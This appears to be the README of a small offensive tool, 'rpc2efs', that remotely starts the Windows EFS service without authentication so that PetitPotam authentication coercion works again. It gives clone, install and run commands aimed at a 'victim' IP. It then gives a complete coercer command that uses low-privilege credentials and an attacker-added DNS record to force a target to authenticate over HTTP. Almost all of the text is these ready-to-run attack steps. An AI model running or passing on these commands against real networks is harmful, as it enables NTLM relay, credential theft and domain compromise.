# rpc2efs

A small tool that performs an unauthenticated start of the EFS service on a remote Windows host ("make PetitPotam great again").

## Install/run

Get impacket, then:

```bash
# Clone repo:
git clone https://github.com/Hypnoze57/rpc2efs.git

# Install impacket if needed
python3 -m venv venv
source venv/bin/activate
pip install impacket

# Politely ask EFS to run:
python3 rpc2efs.py ip.address.of.victim

# Once run, the output should say:
# [*] EFS should be running now.
```

## Attack

```bash
coercer coerce --auth-type http -u lowpriv -p 'MyPassLOL!' -l ROGUE-DNS-RECORD-I-ADDED-PREVIOUSLY -t ip.of.victim2.coerce --filter-pipe-name efsrpc
```